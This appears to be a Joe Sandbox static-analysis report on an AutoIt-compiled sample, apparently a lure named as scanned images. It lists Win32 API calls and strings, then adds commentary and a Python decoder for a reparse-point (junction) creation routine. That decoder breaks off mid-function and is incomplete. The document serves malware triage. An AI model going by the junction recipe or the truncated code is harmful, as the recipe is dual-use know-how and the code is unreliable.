• _wcscpy.LIBCMT ref: 00A8473C
• _wcscmp.LIBCMT ref: 00A84747
• _wcscat.LIBCMT ref: 00A8475D
• _wcsstr.LIBCMT ref: 00A84768
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A84784
• _wcscat.LIBCMT ref: 00A847CD
• _wcscat.LIBCMT ref: 00A847D4
• _wcsncpy.LIBCMT ref: 00A847FF
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A228BC
• GetSystemMetrics.USER32(00000007), ref: 00A228C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A228EF
• GetSystemMetrics.USER32(00000008), ref: 00A228F7
• GetSystemMetrics.USER32(00000004), ref: 00A2291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A22939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A22949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A2297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A22990
• GetClientRect.USER32(00000000,000000FF), ref: 00A229AE
• GetStockObject.GDI32(00000011), ref: 00A229CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00A229D5
  • Part of subcall function 00A22344: GetCursorPos.USER32(?), ref: 00A22357
  • Part of subcall function 00A22344: ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
  • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000001), ref: 00A22399
  • Part of subcall function 00A22344: GetAsyncKeyState.USER32(00000002), ref: 00A223A7
• SetTimer.USER32(00000000,00000000,00000028,00A21256), ref: 00A229FC
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: @U=u$AutoIt v3 GUI
• API String ID: 1458621304-2077007950
APIs
• LoadIconW.USER32(00000063), ref: 00A7C4D4
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A7C4E6
• SetWindowTextW.USER32(?,?), ref: 00A7C4FD
• GetDlgItem.USER32(?,000003EA), ref: 00A7C512
• SetWindowTextW.USER32(00000000,?), ref: 00A7C518
• GetDlgItem.USER32(?,000003E9), ref: 00A7C528
• SetWindowTextW.USER32(00000000,?), ref: 00A7C52E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A7C54F
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A7C569
• GetWindowRect.USER32(?,?), ref: 00A7C572
• SetWindowTextW.USER32(?,?), ref: 00A7C5DD
• GetDesktopWindow.USER32 ref: 00A7C5E3
• GetWindowRect.USER32(00000000), ref: 00A7C5EA
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A7C636
• GetClientRect.USER32(?,?), ref: 00A7C643
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A7C668
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A7C693
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID: @U=u
• API String ID: 3869813825-2594219639
APIs
• CharUpperBuffW.USER32(?,?), ref: 00AA40F6
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AA41B6
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-1753161424
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00A95309
• LoadCursorW.USER32(00000000,00007F8A), ref: 00A95314
• LoadCursorW.USER32(00000000,00007F00), ref: 00A9531F
• LoadCursorW.USER32(00000000,00007F03), ref: 00A9532A
• LoadCursorW.USER32(00000000,00007F8B), ref: 00A95335
• LoadCursorW.USER32(00000000,00007F01), ref: 00A95340
• LoadCursorW.USER32(00000000,00007F81), ref: 00A9534B
• LoadCursorW.USER32(00000000,00007F88), ref: 00A95356
• LoadCursorW.USER32(00000000,00007F80), ref: 00A95361
• LoadCursorW.USER32(00000000,00007F86), ref: 00A9536C
• LoadCursorW.USER32(00000000,00007F83), ref: 00A95377
• LoadCursorW.USER32(00000000,00007F85), ref: 00A95382
• LoadCursorW.USER32(00000000,00007F82), ref: 00A9538D
• LoadCursorW.USER32(00000000,00007F84), ref: 00A95398
• LoadCursorW.USER32(00000000,00007F04), ref: 00A953A3
• LoadCursorW.USER32(00000000,00007F02), ref: 00A953AE
• GetCursorInfo.USER32(?), ref: 00A953BE
• GetLastError.KERNEL32(00000001,00000000), ref: 00A953E9
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00A7AAA5
• __swprintf.LIBCMT ref: 00A7AB46
• _wcscmp.LIBCMT ref: 00A7AB59
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A7ABAE
• _wcscmp.LIBCMT ref: 00A7ABEA
• GetClassNameW.USER32(?,?,00000400), ref: 00A7AC21
• GetDlgCtrlID.USER32(?), ref: 00A7AC73
• GetWindowRect.USER32(?,?), ref: 00A7ACA9
• GetParent.USER32(?), ref: 00A7ACC7
• ScreenToClient.USER32(00000000), ref: 00A7ACCE
• GetClassNameW.USER32(?,?,00000100), ref: 00A7AD48
• _wcscmp.LIBCMT ref: 00A7AD5C
• GetWindowTextW.USER32(?,?,00000400), ref: 00A7AD82
• _wcscmp.LIBCMT ref: 00A7AD96
  • Part of subcall function 00A4386C: _iswctype.LIBCMT ref: 00A43874
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: 448b0dd07053f296b175c7819e3ec78e75f395fd585cbfe4cca39c7409ee63af
                                                        • Instruction ID: cd5491f5ebd1bc4f646b12280e4640ddfdebf3ed084c49eab64ea1f59372a7df
                                                        • Opcode Fuzzy Hash: 448b0dd07053f296b175c7819e3ec78e75f395fd585cbfe4cca39c7409ee63af
                                                        • Instruction Fuzzy Hash: 66A1CE32204206BFDB29DF64CC84BAEB7A8FF94355F00C629F99D92191D730E945CB92
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00A7B3DB
                                                        • _wcscmp.LIBCMT ref: 00A7B3EC
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A7B414
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00A7B431
                                                        • _wcscmp.LIBCMT ref: 00A7B44F
                                                        • _wcsstr.LIBCMT ref: 00A7B460
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A7B498
                                                        • _wcscmp.LIBCMT ref: 00A7B4A8
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A7B4CF
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A7B518
                                                        • _wcscmp.LIBCMT ref: 00A7B528
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00A7B550
                                                        • GetWindowRect.USER32(00000004,?), ref: 00A7B5B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 077bb453e5df36cfbddbec7087cb1ad798c3907e0d7857ca1fd22add7ce9e6ef
                                                        • Instruction ID: 4d3182df6ac4096f122a85df14eff0657df8d45364c777a77464d2d76f93fc8e
                                                        • Opcode Fuzzy Hash: 077bb453e5df36cfbddbec7087cb1ad798c3907e0d7857ca1fd22add7ce9e6ef
                                                        • Instruction Fuzzy Hash: B1819EB11182069FDB04DF54CD85FAA7BE8EF44314F04C569FD899A092DB34DE49CB61
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AAA4C8
                                                        • DestroyWindow.USER32(?,?), ref: 00AAA542
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AAA5BC
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AAA5DE
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AAA5F1
                                                        • DestroyWindow.USER32(00000000), ref: 00AAA613
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A20000,00000000), ref: 00AAA64A
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AAA663
                                                        • GetDesktopWindow.USER32 ref: 00AAA67C
                                                        • GetWindowRect.USER32(00000000), ref: 00AAA683
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AAA69B
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AAA6B3
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$@U=u$tooltips_class32
                                                        • API String ID: 1297703922-1130792468
                                                        • Opcode ID: 9a95482b3b453aa1c4b7c2e74ca02b27b3fccd01cd5b94a1ab39a55fc78ec30b
                                                        • Instruction ID: 2726b31833096d75d5496af7235f93c5fe784b84191c9f87c1e4549c6484d0ef
                                                        • Opcode Fuzzy Hash: 9a95482b3b453aa1c4b7c2e74ca02b27b3fccd01cd5b94a1ab39a55fc78ec30b
                                                        • Instruction Fuzzy Hash: 0B71AC71140245AFD724CF68CC49F6A7BE6FBAA304F08492DF9858B2A1D771E902CF56
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00AAC917
                                                          • Part of subcall function 00AAADF1: ClientToScreen.USER32(?,?), ref: 00AAAE1A
                                                          • Part of subcall function 00AAADF1: GetWindowRect.USER32(?,?), ref: 00AAAE90
                                                          • Part of subcall function 00AAADF1: PtInRect.USER32(?,?,00AAC304), ref: 00AAAEA0
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AAC980
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AAC98B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AAC9AE
                                                        • _wcscat.LIBCMT ref: 00AAC9DE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AAC9F5
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AACA0E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AACA25
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AACA47
                                                        • DragFinish.SHELL32(?), ref: 00AACA4E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AACB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                        • API String ID: 169749273-762882726
                                                        • Opcode ID: 248a457383f409a6fe6b50952f7c2824032af00c99b8877c17926a7edbc055e4
                                                        • Instruction ID: 9edba27795f6d22db6163c735f26d62d9f08a03b61ceee3dc57a6089c583b2a0
                                                        • Opcode Fuzzy Hash: 248a457383f409a6fe6b50952f7c2824032af00c99b8877c17926a7edbc055e4
                                                        • Instruction Fuzzy Hash: AF616A71108311AFC711DFA4D985D9FBBE8FF99750F00092EF591971A1DB309A09CBA2
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 9150e71f535d2f96c1731242dbdc3cff3e806dffc8fa7cbb243fe1a47a9403df
                                                        • Instruction ID: 6aed9ee7393164e5bd6375608a53a97cf2cba691b6c5887e46644aa86dfb2dc9
                                                        • Opcode Fuzzy Hash: 9150e71f535d2f96c1731242dbdc3cff3e806dffc8fa7cbb243fe1a47a9403df
                                                        • Instruction Fuzzy Hash: 0331E271A54215A6DF10FA64DE43FEE7778AF10750F20892AF406721E2EF21AF04C6A0
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00AA46AB
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA46F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-383632319
                                                        • Opcode ID: 6e1dc2b3f964e91f1df0e6f206693a0a2c29b735aeea026f6a129e4ef70a32b8
                                                        • Instruction ID: 351511cab5c3b308759188b374f1873b9f477a9ceab5a818464d49ef184fc13d
                                                        • Opcode Fuzzy Hash: 6e1dc2b3f964e91f1df0e6f206693a0a2c29b735aeea026f6a129e4ef70a32b8
                                                        • Instruction Fuzzy Hash: A091AC34604711DFCB14EF24DA51A6EB7A1AF89714F00886DF8965B3E2CB71ED4ACB81
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AABB6E
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00AA6D80,?), ref: 00AABBCA
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AABC03
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AABC46
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AABC7D
                                                        • FreeLibrary.KERNEL32(?), ref: 00AABC89
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AABC99
                                                        • DestroyIcon.USER32(?), ref: 00AABCA8
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AABCC5
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AABCD1
                                                          • Part of subcall function 00A4313D: __wcsicmp_l.LIBCMT ref: 00A431C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl$@U=u
                                                        • API String ID: 1212759294-1639919054
                                                        • Opcode ID: 9a9bb1928d789466488e1f9133f77b8ab63168da74c13e2764cc68086262f3c8
                                                        • Instruction ID: 64f812aff9dd21564512aa4b6f5e447ff41fdab3786ed54661883014eeb2b63d
                                                        • Opcode Fuzzy Hash: 9a9bb1928d789466488e1f9133f77b8ab63168da74c13e2764cc68086262f3c8
                                                        • Instruction Fuzzy Hash: 6561EF71510219BEEB24DFA4CD42FBA77A8EB09721F104219F815D71D2DB75AA90CBB0
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A8A636
                                                        • GetDriveTypeW.KERNEL32 ref: 00A8A683
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A6CB
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A702
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A730
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: c4a9c37a9b914be63269ca68a8c082a6ab8acb44e6ad9b83cec4481e7a756509
                                                        • Instruction ID: 88ccf0482bf5b14b657d437f40988736374faa39e22f038246877e5f0abf9022
                                                        • Opcode Fuzzy Hash: c4a9c37a9b914be63269ca68a8c082a6ab8acb44e6ad9b83cec4481e7a756509
                                                        • Instruction Fuzzy Hash: 26517A711083159FC700EF24DA8186AB7F8FF98758F04496DF886972A1DB31EE0ACB52
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8A47A
                                                        • __swprintf.LIBCMT ref: 00A8A49C
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A8A4D9
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A8A4FE
                                                        • _memset.LIBCMT ref: 00A8A51D
                                                        • _wcsncpy.LIBCMT ref: 00A8A559
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A8A58E
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8A599
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00A8A5A2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8A5AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: dfcd28270fd91dacd18f8914ee3b8477640c6206d1e6dc8a3b3f5c09b9a6a456
                                                        • Instruction ID: 672c25134aef6312a56be35505f87650214d355a6f7efcb8b502304c5a9e5e49
                                                        • Opcode Fuzzy Hash: dfcd28270fd91dacd18f8914ee3b8477640c6206d1e6dc8a3b3f5c09b9a6a456
                                                        • Instruction Fuzzy Hash: AB3180B650010AABEB21DFA0DC49FEB77BCEF89701F1041B6FA08D6190E77496858B25
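The function record above (GetFullPathNameW, CreateDirectoryW, CreateFileW with flags 02200000, DeviceIoControl with control code 000900A4, and the string "\??\%s") is the standard Win32 recipe for turning a freshly created directory into a reparse point: open the directory with FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT and issue FSCTL_SET_REPARSE_POINT with an NT-style "\??\" substitute path. The constants are only meaningful once decoded, so the following added example (not code from the report, Joe Sandbox or the AutoIt runtime) parses the "APIs" lines as printed, decodes the CreateFileW access/disposition/flag words and the CTL_CODE, and flags the open-then-set-reparse-point pair. The input list is constructed from the lines above; the constant names are the documented winnt.h/winioctl.h values. One caveat a triager should keep in mind: because the sample is a compiled AutoIt script, these functions are the interpreter's built-in routines, and this static listing does not by itself show that the script ever reaches this one.

```python
"""Decode the CreateFileW / DeviceIoControl sequence from a Joe Sandbox 'APIs' block.
Added example for reading the report; not part of the report or of the sample."""
import re

# Constructed input: the API reference lines of the function record above, as printed.
# Argument values are hexadecimal; '?' marks a value the disassembler could not resolve.
API_LINES = [
    "GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8A47A",
    "__swprintf.LIBCMT ref: 00A8A49C",
    "CreateDirectoryW.KERNEL32(?,00000000), ref: 00A8A4D9",
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A8A4FE",
    "_memset.LIBCMT ref: 00A8A51D",
    "_wcsncpy.LIBCMT ref: 00A8A559",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A8A58E",
    "CloseHandle.KERNEL32(00000000), ref: 00A8A599",
    "RemoveDirectoryW.KERNEL32(?), ref: 00A8A5A2",
    "CloseHandle.KERNEL32(00000000), ref: 00A8A5AC",
]

# 'Api.MODULE(arg,arg,...), ref: ADDR' or 'Api.MODULE ref: ADDR' (no argument list).
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Win32 constants from winnt.h / winioctl.h.
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",   # needed to open a directory handle
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",  # operate on the link, not its target
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_DEVICE_FILE_SYSTEM = 9
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def parse_api_line(line):
    """Split one report line into api/module/args/ref; returns None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [None if a == "?" else int(a, 16) for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def names_for_mask(value, table):
    """Expand a bit mask into sorted flag names; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return sorted(names)


def decode_ctl_code(code):
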